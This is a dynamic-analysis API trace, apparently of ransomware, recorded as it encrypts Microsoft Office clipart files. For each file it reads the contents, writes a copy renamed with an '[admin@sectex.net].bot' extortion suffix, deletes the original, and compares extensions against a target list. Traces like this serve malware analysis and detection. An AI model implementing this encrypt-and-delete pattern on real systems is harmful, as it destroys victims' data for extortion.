	[0169.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153089.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124
	[0169.329] GetFileSizeEx (in: hFile=0x124, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=7848) returned 1
	[0169.329] CloseHandle (hObject=0x124) returned 1
	[0169.329] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153089.wmf")) returned 0x20
	[0169.329] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153089.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.330] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153089.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124
	[0169.330] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.330] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.330] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153089.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0169.331] GetLastError () returned 0x0
	[0169.331] ReadFile (in: hFile=0x124, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x1ea8, lpOverlapped=0x0) returned 1
	[0169.335] WriteFile (in: hFile=0x188, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1eb0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1eb0, lpOverlapped=0x0) returned 1
	[0169.336] ReadFile (in: hFile=0x124, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.336] WriteFile (in: hFile=0x188, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.336] SetEndOfFile (hFile=0x188) returned 1
	[0169.336] CloseHandle (hObject=0x188) returned 1
	[0169.336] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.336] SetEndOfFile (hFile=0x124) returned 1
	[0169.339] CloseHandle (hObject=0x124) returned 1
	[0169.339] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.339] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153089.wmf")) returned 1
	[0169.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF") returned 63
	[0169.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF") returned 63
	[0169.340] lstrlenW (lpString=".doc") returned 4
	[0169.340] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.340] lstrlenW (lpString=".docx") returned 5
	[0169.340] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1
	[0169.340] lstrlenW (lpString=".pdf") returned 4
	[0169.340] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.340] lstrlenW (lpString=".xls") returned 4
	[0169.340] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.340] lstrlenW (lpString=".xlsx") returned 5
	[0169.340] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1
	[0169.340] lstrlenW (lpString=".ppt") returned 4
	[0169.340] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF") returned 63
	[0169.340] lstrlenW (lpString=".zip") returned 4
	[0169.340] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.340] lstrlenW (lpString=".rar") returned 4
	[0169.340] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.340] lstrlenW (lpString=".bz2") returned 4
	[0169.340] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.340] lstrlenW (lpString=".7z") returned 3
	[0169.340] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF") returned 63
	[0169.340] lstrlenW (lpString=".dbf") returned 4
	[0169.340] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF") returned 63
	[0169.340] lstrlenW (lpString=".1cd") returned 4
	[0169.340] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF") returned 63
	[0169.340] lstrlenW (lpString=".jpg") returned 4
	[0169.340] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF") returned 63
	[0169.341] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF") returned 63
	[0169.341] lstrlenW (lpString=".doc") returned 4
	[0169.341] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.341] lstrlenW (lpString=".docx") returned 5
	[0169.341] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1
	[0169.341] lstrlenW (lpString=".pdf") returned 4
	[0169.341] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.341] lstrlenW (lpString=".xls") returned 4
	[0169.341] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.341] lstrlenW (lpString=".xlsx") returned 5
	[0169.341] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1
	[0169.341] lstrlenW (lpString=".ppt") returned 4
	[0169.341] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.341] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF") returned 63
	[0169.341] lstrlenW (lpString=".zip") returned 4
	[0169.341] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.341] lstrlenW (lpString=".rar") returned 4
	[0169.341] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.341] lstrlenW (lpString=".bz2") returned 4
	[0169.341] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.341] lstrlenW (lpString=".7z") returned 3
	[0169.341] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.341] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF") returned 63
	[0169.341] lstrlenW (lpString=".dbf") returned 4
	[0169.341] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.341] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF") returned 63
	[0169.341] lstrlenW (lpString=".1cd") returned 4
	[0169.341] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.341] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF") returned 63
	[0169.341] lstrlenW (lpString=".jpg") returned 4
	[0169.341] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.342] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.342] lstrlenW (lpString="J0153091.WMF") returned 12
	[0169.342] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153091.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0169.456] GetFileSizeEx (in: hFile=0x118, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=8136) returned 1
	[0169.456] CloseHandle (hObject=0x118) returned 1
	[0169.456] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153091.wmf")) returned 0x20
	[0169.456] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153091.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.456] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153091.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0169.457] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.457] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.457] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153091.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0169.458] GetLastError () returned 0x0
	[0169.458] ReadFile (in: hFile=0x118, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x1fc8, lpOverlapped=0x0) returned 1
	[0169.482] WriteFile (in: hFile=0x354, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1fd0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1fd0, lpOverlapped=0x0) returned 1
	[0169.483] ReadFile (in: hFile=0x118, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.483] WriteFile (in: hFile=0x354, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.483] SetEndOfFile (hFile=0x354) returned 1
	[0169.483] CloseHandle (hObject=0x354) returned 1
	[0169.483] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.483] SetEndOfFile (hFile=0x118) returned 1
	[0169.485] CloseHandle (hObject=0x118) returned 1
	[0169.485] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.487] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153091.wmf")) returned 1
	[0169.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF") returned 63
	[0169.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF") returned 63
	[0169.487] lstrlenW (lpString=".doc") returned 4
	[0169.487] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.488] lstrlenW (lpString=".docx") returned 5
	[0169.488] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1
	[0169.488] lstrlenW (lpString=".pdf") returned 4
	[0169.488] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.488] lstrlenW (lpString=".xls") returned 4
	[0169.488] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.488] lstrlenW (lpString=".xlsx") returned 5
	[0169.488] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1
	[0169.488] lstrlenW (lpString=".ppt") returned 4
	[0169.488] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF") returned 63
	[0169.488] lstrlenW (lpString=".zip") returned 4
	[0169.488] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.488] lstrlenW (lpString=".rar") returned 4
	[0169.488] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.488] lstrlenW (lpString=".bz2") returned 4
	[0169.488] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.488] lstrlenW (lpString=".7z") returned 3
	[0169.488] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF") returned 63
	[0169.488] lstrlenW (lpString=".dbf") returned 4
	[0169.488] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF") returned 63
	[0169.488] lstrlenW (lpString=".1cd") returned 4
	[0169.488] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF") returned 63
	[0169.488] lstrlenW (lpString=".jpg") returned 4
	[0169.488] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF") returned 63
	[0169.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF") returned 63
	[0169.488] lstrlenW (lpString=".doc") returned 4
	[0169.488] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.488] lstrlenW (lpString=".docx") returned 5
	[0169.488] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1
	[0169.488] lstrlenW (lpString=".pdf") returned 4
	[0169.488] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.489] lstrlenW (lpString=".xls") returned 4
	[0169.489] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.489] lstrlenW (lpString=".xlsx") returned 5
	[0169.489] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1
	[0169.489] lstrlenW (lpString=".ppt") returned 4
	[0169.489] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF") returned 63
	[0169.489] lstrlenW (lpString=".zip") returned 4
	[0169.489] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.489] lstrlenW (lpString=".rar") returned 4
	[0169.489] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.489] lstrlenW (lpString=".bz2") returned 4
	[0169.489] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.489] lstrlenW (lpString=".7z") returned 3
	[0169.489] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF") returned 63
	[0169.489] lstrlenW (lpString=".dbf") returned 4
	[0169.489] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF") returned 63
	[0169.489] lstrlenW (lpString=".1cd") returned 4
	[0169.489] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF") returned 63
	[0169.489] lstrlenW (lpString=".jpg") returned 4
	[0169.489] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.489] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.489] lstrlenW (lpString="J0153398.WMF") returned 12
	[0169.489] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153398.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0169.490] GetFileSizeEx (in: hFile=0x118, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=17508) returned 1
	[0169.490] CloseHandle (hObject=0x118) returned 1
	[0169.490] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153398.wmf")) returned 0x20
	[0169.490] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153398.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.490] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153398.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0169.490] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.491] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.491] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153398.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0169.491] GetLastError () returned 0x0
	[0169.491] ReadFile (in: hFile=0x118, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x4464, lpOverlapped=0x0) returned 1
	[0169.494] WriteFile (in: hFile=0x354, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x4470, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x4470, lpOverlapped=0x0) returned 1
	[0169.495] ReadFile (in: hFile=0x118, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.495] WriteFile (in: hFile=0x354, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.495] SetEndOfFile (hFile=0x354) returned 1
	[0169.495] CloseHandle (hObject=0x354) returned 1
	[0169.495] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.495] SetEndOfFile (hFile=0x118) returned 1
	[0169.497] CloseHandle (hObject=0x118) returned 1
	[0169.498] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.498] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153398.wmf")) returned 1
	[0169.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF") returned 63
	[0169.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF") returned 63
	[0169.499] lstrlenW (lpString=".doc") returned 4
	[0169.499] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.499] lstrlenW (lpString=".docx") returned 5
	[0169.499] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0169.499] lstrlenW (lpString=".pdf") returned 4
	[0169.499] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.499] lstrlenW (lpString=".xls") returned 4
	[0169.499] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.499] lstrlenW (lpString=".xlsx") returned 5
	[0169.499] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0169.499] lstrlenW (lpString=".ppt") returned 4
	[0169.499] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF") returned 63
	[0169.499] lstrlenW (lpString=".zip") returned 4
	[0169.499] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.499] lstrlenW (lpString=".rar") returned 4
	[0169.499] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.499] lstrlenW (lpString=".bz2") returned 4
	[0169.499] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.499] lstrlenW (lpString=".7z") returned 3
	[0169.499] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF") returned 63
	[0169.499] lstrlenW (lpString=".dbf") returned 4
	[0169.499] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF") returned 63
	[0169.499] lstrlenW (lpString=".1cd") returned 4
	[0169.499] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF") returned 63
	[0169.499] lstrlenW (lpString=".jpg") returned 4
	[0169.499] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF") returned 63
	[0169.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF") returned 63
	[0169.500] lstrlenW (lpString=".doc") returned 4
	[0169.500] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.500] lstrlenW (lpString=".docx") returned 5
	[0169.500] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0169.500] lstrlenW (lpString=".pdf") returned 4
	[0169.500] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.500] lstrlenW (lpString=".xls") returned 4
	[0169.500] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.500] lstrlenW (lpString=".xlsx") returned 5
	[0169.500] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0169.500] lstrlenW (lpString=".ppt") returned 4
	[0169.500] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF") returned 63
	[0169.500] lstrlenW (lpString=".zip") returned 4
	[0169.500] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.500] lstrlenW (lpString=".rar") returned 4
	[0169.500] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.500] lstrlenW (lpString=".bz2") returned 4
	[0169.500] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.500] lstrlenW (lpString=".7z") returned 3
	[0169.500] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF") returned 63
	[0169.500] lstrlenW (lpString=".dbf") returned 4
	[0169.500] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF") returned 63
	[0169.500] lstrlenW (lpString=".1cd") returned 4
	[0169.500] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF") returned 63
	[0169.500] lstrlenW (lpString=".jpg") returned 4
	[0169.500] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.500] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.501] lstrlenW (lpString="J0153508.WMF") returned 12
	[0169.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153508.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0169.502] GetFileSizeEx (in: hFile=0x118, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=34256) returned 1
	[0169.502] CloseHandle (hObject=0x118) returned 1
